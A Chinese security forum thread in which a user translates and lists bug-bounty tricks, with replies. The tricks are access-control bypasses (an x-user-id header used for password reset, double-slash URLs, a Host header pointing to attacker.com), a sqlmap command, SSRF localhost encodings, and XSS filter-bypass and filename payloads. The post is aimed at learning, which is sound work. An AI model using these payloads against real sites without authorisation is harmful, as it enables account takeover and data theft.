搜索
    Hi~登录注册
    查看: 314|回复: 3
    收起左侧

    挖洞能有什么骚操作

    [复制链接]

    41

    主题

    0

    精华

    46 小时

    在线时间

    密圈

    积分
    37
    发表于 2022-5-12 12:09:51 | 显示全部楼层 |阅读模式

    前言

    这几天一直在科学上网学习,搜刮了一些漏洞挖掘的骚操作,有些操作真的是让人眼前一亮,故有了翻译并整理成文供国内的网络信息安全从业者、爱好者学习的念头。(Ps:完全是随机整理,所以大家自行CTRL+F查询自己想学习的tips吧!)

    TIPS

    一、越权(x-user-id)

    正常访问: GET /api/users/1337 => 401

    越权访问: GET /api/users/ x-user-id: 1337 =>> 200 Ok

    利用方式: POST /api/users/<myID>/password-reset(密码重置) x-user-id: <victimID>

    原理: x-user-id可以让服务器读取这个特定的标头的值,由此使用内部变量来进行身份验证从而达到越权效果。

    二、越权(id后面加.json)

    QQ截图20220512120756.png

    原理: 作者没说,个人猜测是服务端没有对.json进行身份验证

    三、越权(构造新的url)

    正常访问: Target/signup.php => 401

    越权访问: Target/index.php?page=signup => 200

    原理: 作者没说,个人猜测和x-user-id原理差不多,使用了服务端的内部变量进行身份验证。

    四、越权(url加双斜杠)

    正常访问: /api/6798556007/users -> 403

    越权访问: /api/6798556007//users -> 200

    原理: spring对双斜杆url的灵活兼容机制 spring能够灵活适应双斜杠情形的URL,如: /Targetapi/test//configs 拓展: spring 对基于目录的相对url的灵活兼容机制: /Targetapi/test/./abc/configs /Targetapi/test/../abc/configs spring 对带分号url的处理机制: /Targetapi/test/abc;addition/configs 会被处理为: /Targetapi/test/abc/configs

    五、越权(加个https)

    正常访问: POST /user/password-reset/ HTTP 1.1 Host : http://attacker.com

    Response

    • 403 , 404 : False

    越权访问: POST /https://user/password-reset/ HTTP 1.1 Host : http://attacker.com

    Response

    • 200 , 302 : Success

    原理: 作者没说,我也不懂

    六、sql注入(遇到401)

    Payload:sqlmap -u $url --forms --crawl=2 --dbs --ignore-code=401

    QQ截图20220512120903.png

    原理: 当我们正常访问页面状态码提示401的时候只是说明没有访问权限而不是404不存在页面,所以此时我们可以使用sqlmap的爬虫功能爬出来这个页面上的表单进行注入测试。

    七、SSRF绕过

    http://127.1/

    http://0000::1:80/

    http://[::]:80/

    http://2130706433/

    http://[email protected]

    http://0x7f000001/

    http://017700000001

    http://0177.00.00.01

    八、XSS绕过cloudflare

    Payload: <svg onload=alert&#0000000040document.cookie)>

    九、XSS绕过过滤

    Payload: "/><svg+svg+svg\/\/On+OnLoAd=confirm(1)>

    QQ截图20220512120930.png

    十、XSS(上传图片)

    <img src=x onerror=alert('XSS')>.png

    "><img src=x onerror=alert('XSS')>.png

    "><svg onmouseover=alert(1)>.svg

    <<script>alert('xss')<!--a-->a.png

    遇到可以上传图片并且可以自定义文件名的时候可以试试,这样上传以后当我们访问这个图片的时候有可能就会触发xss了。

    总结

    有错请指出,部分没搞懂原理的地方或者原理解释不清晰的地方也请大家集思广益评论。最后祝大家good good study,day day 0day。

    回复

    使用道具 举报

    88

    主题

    0

    精华

    192 小时

    在线时间

    密圈

    积分
    71
    发表于 2022-5-12 12:14:08 | 显示全部楼层
    学到了,牛逼
    回复 支持 反对

    使用道具 举报

    41

    主题

    0

    精华

    46 小时

    在线时间

    密圈

    积分
    37
     楼主| 发表于 2022-5-19 06:51:00 | 显示全部楼层

    大佬谦虚了,都是些皮毛罢了。
    回复 支持 反对

    使用道具 举报

    游客
    回复
    您需要登录后才可以回帖 登录 | 获取账号

    快速回复 返回顶部 返回列表